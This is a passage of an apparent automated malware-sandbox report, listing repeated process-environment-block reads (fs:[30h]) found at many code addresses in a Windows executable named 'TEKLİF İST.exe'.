          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov ecx, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE8350 mov ecx, dword ptr fs:[00000030h]4_2_01BE8350
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502A0 mov eax, dword ptr fs:[00000030h]4_2_01B502A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502A0 mov eax, dword ptr fs:[00000030h]4_2_01B502A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov ecx, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E284 mov eax, dword ptr fs:[00000030h]4_2_01B7E284
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E284 mov eax, dword ptr fs:[00000030h]4_2_01B7E284
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0283 mov eax, dword ptr fs:[00000030h]4_2_01BC0283
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0283 mov eax, dword ptr fs:[00000030h]4_2_01BC0283
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0283 mov eax, dword ptr fs:[00000030h]4_2_01BC0283
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502E1 mov eax, dword ptr fs:[00000030h]4_2_01B502E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502E1 mov eax, dword ptr fs:[00000030h]4_2_01B502E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502E1 mov eax, dword ptr fs:[00000030h]4_2_01B502E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3823B mov eax, dword ptr fs:[00000030h]4_2_01B3823B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44260 mov eax, dword ptr fs:[00000030h]4_2_01B44260
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44260 mov eax, dword ptr fs:[00000030h]4_2_01B44260
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44260 mov eax, dword ptr fs:[00000030h]4_2_01B44260
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3826B mov eax, dword ptr fs:[00000030h]4_2_01B3826B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A250 mov eax, dword ptr fs:[00000030h]4_2_01B3A250
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46259 mov eax, dword ptr fs:[00000030h]4_2_01B46259
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA250 mov eax, dword ptr fs:[00000030h]4_2_01BFA250
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA250 mov eax, dword ptr fs:[00000030h]4_2_01BFA250
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC8243 mov eax, dword ptr fs:[00000030h]4_2_01BC8243
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC8243 mov ecx, dword ptr fs:[00000030h]4_2_01BC8243
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B645B1 mov eax, dword ptr fs:[00000030h]4_2_01B645B1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B645B1 mov eax, dword ptr fs:[00000030h]4_2_01B645B1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC05A7 mov eax, dword ptr fs:[00000030h]4_2_01BC05A7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC05A7 mov eax, dword ptr fs:[00000030h]4_2_01BC05A7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC05A7 mov eax, dword ptr fs:[00000030h]4_2_01BC05A7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E59C mov eax, dword ptr fs:[00000030h]4_2_01B7E59C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B42582 mov eax, dword ptr fs:[00000030h]4_2_01B42582
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B42582 mov ecx, dword ptr fs:[00000030h]4_2_01B42582
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B74588 mov eax, dword ptr fs:[00000030h]4_2_01B74588
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B425E0 mov eax, dword ptr fs:[00000030h]4_2_01B425E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C5ED mov eax, dword ptr fs:[00000030h]4_2_01B7C5ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C5ED mov eax, dword ptr fs:[00000030h]4_2_01B7C5ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B465D0 mov eax, dword ptr fs:[00000030h]4_2_01B465D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A5D0 mov eax, dword ptr fs:[00000030h]4_2_01B7A5D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A5D0 mov eax, dword ptr fs:[00000030h]4_2_01B7A5D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E5CF mov eax, dword ptr fs:[00000030h]4_2_01B7E5CF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E5CF mov eax, dword ptr fs:[00000030h]4_2_01B7E5CF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6500 mov eax, dword ptr fs:[00000030h]4_2_01BD6500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7656A mov eax, dword ptr fs:[00000030h]4_2_01B7656A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7656A mov eax, dword ptr fs:[00000030h]4_2_01B7656A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7656A mov eax, dword ptr fs:[00000030h]4_2_01B7656A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48550 mov eax, dword ptr fs:[00000030h]4_2_01B48550
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48550 mov eax, dword ptr fs:[00000030h]4_2_01B48550
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B744B0 mov ecx, dword ptr fs:[00000030h]4_2_01B744B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCA4B0 mov eax, dword ptr fs:[00000030h]4_2_01BCA4B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B464AB mov eax, dword ptr fs:[00000030h]4_2_01B464AB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA49A mov eax, dword ptr fs:[00000030h]4_2_01BFA49A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B404E5 mov ecx, dword ptr fs:[00000030h]4_2_01B404E5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A430 mov eax, dword ptr fs:[00000030h]4_2_01B7A430
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E420 mov eax, dword ptr fs:[00000030h]4_2_01B3E420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E420 mov eax, dword ptr fs:[00000030h]4_2_01B3E420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E420 mov eax, dword ptr fs:[00000030h]4_2_01B3E420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C427 mov eax, dword ptr fs:[00000030h]4_2_01B3C427
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78402 mov eax, dword ptr fs:[00000030h]4_2_01B78402
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78402 mov eax, dword ptr fs:[00000030h]4_2_01B78402
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78402 mov eax, dword ptr fs:[00000030h]4_2_01B78402
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6A470 mov eax, dword ptr fs:[00000030h]4_2_01B6A470
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6A470 mov eax, dword ptr fs:[00000030h]4_2_01B6A470
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6A470 mov eax, dword ptr fs:[00000030h]4_2_01B6A470
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCC460 mov ecx, dword ptr fs:[00000030h]4_2_01BCC460
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA456 mov eax, dword ptr fs:[00000030h]4_2_01BFA456
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6245A mov eax, dword ptr fs:[00000030h]4_2_01B6245A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3645D mov eax, dword ptr fs:[00000030h]4_2_01B3645D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B407AF mov eax, dword ptr fs:[00000030h]4_2_01B407AF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF47A0 mov eax, dword ptr fs:[00000030h]4_2_01BF47A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE678E mov eax, dword ptr fs:[00000030h]4_2_01BE678E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B447FB mov eax, dword ptr fs:[00000030h]4_2_01B447FB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B447FB mov eax, dword ptr fs:[00000030h]4_2_01B447FB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B627ED mov eax, dword ptr fs:[00000030h]4_2_01B627ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B627ED mov eax, dword ptr fs:[00000030h]4_2_01B627ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B627ED mov eax, dword ptr fs:[00000030h]4_2_01B627ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCE7E1 mov eax, dword ptr fs:[00000030h]4_2_01BCE7E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4C7C0 mov eax, dword ptr fs:[00000030h]4_2_01B4C7C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC07C3 mov eax, dword ptr fs:[00000030h]4_2_01BC07C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7273C mov eax, dword ptr fs:[00000030h]4_2_01B7273C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7273C mov ecx, dword ptr fs:[00000030h]4_2_01B7273C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7273C mov eax, dword ptr fs:[00000030h]4_2_01B7273C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBC730 mov eax, dword ptr fs:[00000030h]4_2_01BBC730
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C720 mov eax, dword ptr fs:[00000030h]4_2_01B7C720
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C720 mov eax, dword ptr fs:[00000030h]4_2_01B7C720
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40710 mov eax, dword ptr fs:[00000030h]4_2_01B40710
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B70710 mov eax, dword ptr fs:[00000030h]4_2_01B70710
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C700 mov eax, dword ptr fs:[00000030h]4_2_01B7C700
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48770 mov eax, dword ptr fs:[00000030h]4_2_01B48770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]4_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCE75D mov eax, dword ptr fs:[00000030h]4_2_01BCE75D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40750 mov eax, dword ptr fs:[00000030h]4_2_01B40750
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82750 mov eax, dword ptr fs:[00000030h]4_2_01B82750
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82750 mov eax, dword ptr fs:[00000030h]4_2_01B82750
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC4755 mov eax, dword ptr fs:[00000030h]4_2_01BC4755
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7674D mov esi, dword ptr fs:[00000030h]4_2_01B7674D
